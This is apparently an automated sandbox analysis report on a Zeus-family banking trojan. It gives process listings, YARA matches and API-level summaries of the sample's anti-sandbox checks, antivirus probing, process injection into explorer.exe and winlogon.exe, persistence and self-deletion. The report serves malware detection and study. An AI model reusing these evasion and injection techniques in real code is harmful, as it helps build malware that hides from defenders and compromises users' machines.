                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                  Start time:12:51:16
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                  Start time:12:51:18
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                  Start time:12:51:19
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                  Start time:12:51:20
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908
                                                                                                                                                                                                                  Imagebase:0x320000
                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                  Start time:12:51:21
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe"
                                                                                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                                                                                  File size:140'800 bytes
                                                                                                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:65.2%
                                                                                                                                                                                                                    Total number of Nodes:244
                                                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                                                    execution_graph 29816 402c10 LoadLibraryA GetModuleFileNameA 29888 403900 RegOpenKeyExA 29816->29888 29819 402c44 ExitProcess 29820 402c4c 29902 4020b0 CreateFileA 29820->29902 29825 402c81 29913 402240 CreateFileA 29825->29913 29826 402c69 GetTickCount PostMessageA 29826->29825 29835 402ca1 30025 401d80 40 API calls 29835->30025 29836 402cc3 IsUserAnAdmin GetModuleHandleA 29837 402cfc 29836->29837 29838 402cdd GetProcAddress 29836->29838 29842 402d02 29837->29842 29843 402d4e 29837->29843 29838->29837 29841 402cef GetCurrentProcess 29838->29841 29840 402ca6 29844 402cb2 29840->29844 29845 402caa ExitProcess 29840->29845 29841->29837 29848 402d06 StrStrIA 29842->29848 29849 402d1c 29842->29849 29846 402d56 StrStrIA 29843->29846 29847 402ddd 29843->29847 30026 403440 70 API calls 29844->30026 29851 402d81 29846->29851 29852 402d6c 29846->29852 29855 402810 9 API calls 29847->29855 29848->29849 29853 402d3f 29848->29853 29939 402810 RegCreateKeyExA 29849->29939 29860 402950 93 API calls 29851->29860 29859 402810 9 API calls 29852->29859 29979 402950 VirtualQuery GetModuleFileNameA 29853->29979 29856 402de8 GlobalFindAtomA 29855->29856 29864 402e38 ExitProcess 29856->29864 29865 402df8 GlobalAddAtomA IsUserAnAdmin 29856->29865 29858 402cb7 29858->29836 29867 402cbb ExitProcess 29858->29867 29868 402d77 29859->29868 29862 402d86 GlobalFindAtomA 29860->29862 29869 402dd6 29862->29869 29870 402d96 GlobalAddAtomA IsUserAnAdmin 29862->29870 29872 402e19 IsUserAnAdmin 29865->29872 29873 402e09 29865->29873 30027 4027b0 43 API calls 29868->30027 29879 4011c0 9 API calls 29869->29879 29876 402db7 IsUserAnAdmin 29870->29876 29877 402da7 29870->29877 29878 402e24 29872->29878 29873->29872 29880 402dc2 29876->29880 29877->29876 30029 4014b0 7 API calls 29878->30029 29882 402d49 29879->29882 30028 4014b0 7 API calls 29880->30028 29882->29864 29884 402e2f 29884->29864 29886 401580 32 API calls 29884->29886 29885 402dcd 29885->29869 29887 401580 32 API calls 29885->29887 29886->29864 29887->29869 29889 40394a RegQueryValueExA 29888->29889 29890 4039ad GetUserNameA CharUpperA strstr 29888->29890 29893 40397b RegCloseKey 29889->29893 29894 40396f RegCloseKey 29889->29894 29891 402c40 29890->29891 29892 4039eb strstr 29890->29892 29891->29819 29891->29820 29892->29891 29895 403a04 strstr 29892->29895 29893->29890 29897 40398e 29893->29897 29894->29890 29895->29891 29896 403a1d GetSystemWindowsDirectoryA GetVolumeInformationA 29895->29896 29896->29891 29898 403a5d 29896->29898 29897->29890 29897->29891 29898->29891 29899 403a79 GetModuleFileNameA StrStrIA 29898->29899 29899->29891 29900 403aa5 StrStrIA 29899->29900 29900->29891 29901 403ab7 StrStrIA 29900->29901 29901->29891 29903 402230 29902->29903 29904 402200 DeviceIoControl CloseHandle 29902->29904 29905 401fc0 memset SHGetFolderPathA 29903->29905 29904->29903 29906 402087 29905->29906 29907 40201e PathAppendA SetCurrentDirectoryA 29905->29907 29908 402092 FindWindowA 29906->29908 29909 40208b FreeLibrary 29906->29909 29907->29906 29910 402041 LoadLibraryA 29907->29910 29908->29825 29908->29826 29909->29908 29910->29906 29911 402055 GetProcAddress 29910->29911 29911->29906 29912 402065 29911->29912 29912->29906 29914 4022e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 29913->29914 29915 402324 29913->29915 29914->29915 29916 402330 SHGetFolderPathA 29915->29916 29917 402415 29916->29917 29918 402357 MoveFileA 29916->29918 29920 402420 SHGetFolderPathA 29917->29920 29918->29917 29921 40244b CreateFileA 29920->29921 29924 40254f 29920->29924 29923 4024b1 11 API calls 29921->29923 29921->29924 29923->29924 29925 402560 CoInitializeEx 29924->29925 29926 40258e 29925->29926 29927 40259f GetModuleFileNameW SysAllocString 29925->29927 29926->29927 29929 4027a4 IsUserAnAdmin 29926->29929 29928 4025cd SysAllocString 29927->29928 29934 402746 29927->29934 29930 402733 SysFreeString 29928->29930 29931 4025de CoCreateInstance 29928->29931 29929->29835 29929->29836 29932 402743 SysFreeString 29930->29932 29930->29934 29933 402707 29931->29933 29936 402605 29931->29936 29932->29934 29933->29930 29934->29929 29935 40279e CoUninitialize 29934->29935 29935->29929 29936->29930 29936->29933 29937 402693 CoCreateInstance 29936->29937 29938 4026b5 29937->29938 29938->29933 29940 402855 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 29939->29940 29941 4028dd RegCreateKeyExA 29939->29941 29943 4028c0 RegSetValueExA 29940->29943 29942 402924 29941->29942 29941->29943 29944 40292c RegFlushKey RegCloseKey 29942->29944 29945 40293d GetCurrentProcessId 29942->29945 29943->29942 29944->29945 29947 401580 29945->29947 29948 4017e8 Sleep 29947->29948 29950 401596 29947->29950 29948->29864 29951 4015b5 29950->29951 29952 4015ab Sleep 29950->29952 30030 401c70 11 API calls 29950->30030 30031 401c70 11 API calls 29951->30031 29952->29950 29952->29951 29954 4015bc 29955 4017e3 29954->29955 29956 4015c4 OpenProcess 29954->29956 29955->29948 29956->29955 29957 4015df GetModuleHandleA 29956->29957 29958 401616 29957->29958 29959 4015fb GetProcAddress 29957->29959 29960 40161c GetModuleHandleA 29958->29960 29961 40164f VirtualAllocEx 29958->29961 29959->29958 29962 401609 GetCurrentProcess 29959->29962 29963 401632 GetProcAddress 29960->29963 29964 40163e 29960->29964 29965 4017c0 GetHandleInformation 29961->29965 29966 401692 WriteProcessMemory 29961->29966 29962->29958 29963->29964 29964->29961 29964->29965 29965->29955 29967 4017d6 29965->29967 29968 4016be 29966->29968 29969 40172f WriteProcessMemory FlushInstructionCache CreateRemoteThread 29966->29969 29967->29955 29970 4017dc CloseHandle 29967->29970 29971 4016c1 VirtualAlloc 29968->29971 29977 401729 29968->29977 29972 401772 GetHandleInformation 29969->29972 29973 40179e RtlCreateUserThread 29969->29973 29970->29955 29971->29968 29974 4016d9 memcpy WriteProcessMemory VirtualFree 29971->29974 29975 401795 29972->29975 29976 401788 29972->29976 29973->29965 29974->29968 29975->29965 29976->29975 29978 40178e CloseHandle 29976->29978 29977->29969 29978->29975 29980 4029b0 29979->29980 29980->29980 29981 4029bf PathFileExistsA 29980->29981 29982 4029d2 GetSystemWindowsDirectoryA 29981->29982 29983 402ad9 _snprintf CopyFileA 29981->29983 29984 4029e7 29982->29984 29985 402c06 29983->29985 29986 402b16 29983->29986 29984->29984 29987 4029ef GetModuleHandleA 29984->29987 30020 4011c0 VirtualQuery GetModuleFileNameA PathFileExistsA 29985->30020 29988 402810 9 API calls 29986->29988 29989 402a47 29987->29989 29990 402a27 GetProcAddress 29987->29990 29991 402b1f 29988->29991 29993 402a76 GetTickCount 29989->29993 30017 402a4d 29989->30017 29990->29989 29992 402a39 GetCurrentProcess 29990->29992 30032 401a30 29991->30032 29992->29989 30099 4012a0 GetTickCount GetModuleHandleA GetProcAddress 29993->30099 29998 402a82 30100 401330 GetTickCount GetModuleHandleA GetProcAddress 29998->30100 30001 402b39 RtlImageNtHeader 30004 402b44 30001->30004 30005 402b5d GetProcessHeap HeapValidate 30001->30005 30002 402b7d 30077 401b60 CreateFileA 30002->30077 30066 401000 30004->30066 30005->30002 30006 402b72 GetProcessHeap RtlFreeHeap 30005->30006 30006->30002 30009 402bcf 30013 402bdf GlobalFindAtomA 30009->30013 30088 4013c0 memset memset lstrcpynA CreateProcessA 30009->30088 30010 402baf GetProcAddress 30010->30009 30012 402bc1 GetCurrentProcess 30010->30012 30011 402b5b 30011->30005 30012->30009 30015 402bfb GlobalAddAtomA 30013->30015 30016 402bef 30013->30016 30015->29985 30018 4011c0 9 API calls 30016->30018 30017->29983 30019 402bf4 ExitProcess 30018->30019 30021 40128f 30020->30021 30022 40121c GetTempPathA GetTempFileNameA MoveFileExA 30020->30022 30021->29882 30022->30021 30023 401263 SetFileAttributesA DeleteFileA 30022->30023 30023->30021 30024 401283 MoveFileExA 30023->30024 30024->30021 30025->29840 30026->29858 30027->29882 30028->29885 30029->29884 30030->29950 30031->29954 30033 401b53 30032->30033 30034 401a4b 30032->30034 30051 4010a0 30033->30051 30035 4010a0 13 API calls 30034->30035 30036 401a54 30035->30036 30036->30033 30037 401a5e RtlImageNtHeader 30036->30037 30038 401b31 GetProcessHeap HeapValidate 30037->30038 30039 401a6f GetTickCount GetModuleHandleA 30037->30039 30038->30033 30040 401b47 GetProcessHeap RtlFreeHeap 30038->30040 30041 401a92 GetProcAddress 30039->30041 30042 401aa9 30039->30042 30040->30033 30041->30042 30044 401aa2 30041->30044 30042->30038 30043 401ac6 CreateFileA 30042->30043 30043->30038 30045 401ae9 WriteFile 30043->30045 30044->30042 30046 401b03 SetEndOfFile 30045->30046 30047 401b0a 30045->30047 30046->30047 30047->30038 30048 401b15 GetHandleInformation 30047->30048 30048->30038 30049 401b24 30048->30049 30049->30038 30050 401b2a CloseHandle 30049->30050 30050->30038 30052 4010b5 CreateFileA 30051->30052 30053 40118a 30051->30053 30052->30053 30055 4010da GetFileSizeEx 30052->30055 30054 401191 IsBadWritePtr 30053->30054 30056 4011a0 30053->30056 30054->30056 30057 40115e 30055->30057 30058 4010f4 GetProcessHeap RtlAllocateHeap 30055->30058 30056->30001 30056->30002 30057->30053 30059 40116e GetHandleInformation 30057->30059 30058->30057 30060 401110 memset 30058->30060 30059->30053 30061 40117d 30059->30061 30060->30057 30062 401120 ReadFile 30060->30062 30061->30053 30064 401183 CloseHandle 30061->30064 30062->30057 30063 40113d GetProcessHeap HeapValidate 30062->30063 30063->30057 30065 401152 GetProcessHeap HeapFree 30063->30065 30064->30053 30065->30057 30067 401090 30066->30067 30068 40100f 30066->30068 30067->30011 30068->30067 30069 401018 CreateFileA 30068->30069 30070 401086 30069->30070 30071 401037 WriteFile 30069->30071 30070->30011 30072 40105a 30071->30072 30073 40104f SetEndOfFile 30071->30073 30072->30070 30074 40106a GetHandleInformation 30072->30074 30073->30072 30074->30070 30075 401079 30074->30075 30075->30070 30076 40107f CloseHandle 30075->30076 30076->30070 30078 401b92 GetFileTime 30077->30078 30079 401c25 MoveFileExA GetModuleHandleA 30077->30079 30080 401bb0 GetHandleInformation 30078->30080 30081 401bcc CreateFileA 30078->30081 30079->30009 30079->30010 30080->30081 30082 401bbf 30080->30082 30081->30079 30083 401beb SetFileTime 30081->30083 30082->30081 30084 401bc5 CloseHandle 30082->30084 30083->30079 30085 401c09 GetHandleInformation 30083->30085 30084->30081 30085->30079 30086 401c18 30085->30086 30086->30079 30087 401c1e CloseHandle 30086->30087 30087->30079 30089 401443 30088->30089 30090 40149f 30088->30090 30091 401455 GetHandleInformation 30089->30091 30092 40146d 30089->30092 30090->30013 30091->30092 30093 401460 30091->30093 30094 401491 30092->30094 30095 401479 GetHandleInformation 30092->30095 30093->30092 30096 401466 CloseHandle 30093->30096 30094->30013 30095->30094 30097 401484 30095->30097 30096->30092 30097->30094 30098 40148a CloseHandle 30097->30098 30098->30094 30099->29998 30100->30017

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 402c10-402c42 LoadLibraryA GetModuleFileNameA call 403900 3 402c44-402c46 ExitProcess 0->3 4 402c4c-402c67 call 4020b0 call 401fc0 FindWindowA 0->4 9 402c81-402c9f call 402240 call 402330 call 402420 call 402560 IsUserAnAdmin 4->9 10 402c69-402c7b GetTickCount PostMessageA 4->10 19 402ca1-402ca8 call 401d80 9->19 20 402cc3-402cdb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402cb2-402cb9 call 403440 19->28 29 402caa-402cac ExitProcess 19->29 21 402cfc-402d00 20->21 22 402cdd-402ced GetProcAddress 20->22 26 402d02-402d04 21->26 27 402d4e-402d50 21->27 22->21 25 402cef-402cf9 GetCurrentProcess 22->25 25->21 32 402d06-402d1a StrStrIA 26->32 33 402d1c-402d3a call 402810 GetCurrentProcessId call 401580 Sleep 26->33 30 402d56-402d6a StrStrIA 27->30 31 402ddd-402df6 call 402810 GlobalFindAtomA 27->31 28->20 51 402cbb-402cbd ExitProcess 28->51 35 402d81-402d94 call 402950 GlobalFindAtomA 30->35 36 402d6c-402d7c call 402810 call 4027b0 30->36 48 402e38-402e3a ExitProcess 31->48 49 402df8-402e07 GlobalAddAtomA IsUserAnAdmin 31->49 32->33 37 402d3f-402d44 call 402950 call 4011c0 32->37 33->48 53 402dd6-402ddb call 4011c0 35->53 54 402d96-402da5 GlobalAddAtomA IsUserAnAdmin 35->54 36->48 64 402d49 37->64 56 402e19-402e22 IsUserAnAdmin 49->56 57 402e09-402e11 49->57 53->48 60 402db7-402dc0 IsUserAnAdmin 54->60 61 402da7-402daf 54->61 62 402e24 56->62 63 402e29-402e31 call 4014b0 56->63 57->56 67 402dc2 60->67 68 402dc7-402dcf call 4014b0 60->68 61->60 62->63 63->48 74 402e33 call 401580 63->74 64->48 67->68 68->53 75 402dd1 call 401580 68->75 74->48 75->53
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                      • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                                    • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                    • API String ID: 3353599405-700788231
                                                                                                                                                                                                                    • Opcode ID: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                                    • Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD
                                                                                                                                                                                                                    Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 129 403900-403948 RegOpenKeyExA 130 40394a-40396d RegQueryValueExA 129->130 131 4039ad-4039e5 GetUserNameA CharUpperA strstr 129->131 134 40397b-40398c RegCloseKey 130->134 135 40396f-403979 RegCloseKey 130->135 132 403acb 131->132 133 4039eb-4039fe strstr 131->133 137 403acc-403ad2 132->137 133->132 136 403a04-403a17 strstr 133->136 134->131 138 40398e-403995 134->138 135->131 136->132 139 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 136->139 138->131 140 403997-40399e 138->140 139->132 141 403a5d-403a62 139->141 140->131 142 4039a0-4039a7 140->142 141->132 143 403a64-403a69 141->143 142->131 142->137 143->132 144 403a6b-403a70 143->144 144->132 145 403a72-403a77 144->145 145->132 146 403a79-403aa3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403aa5-403ab5 StrStrIA 146->147 147->132 148 403ab7-403ac7 StrStrIA 147->148 148->132 149 403ac9 148->149 149->132
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                    • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                    • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                    • Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8
                                                                                                                                                                                                                    Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 150 4020b0-4021fe CreateFileA 151 402230-402235 150->151 152 402200-40222a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
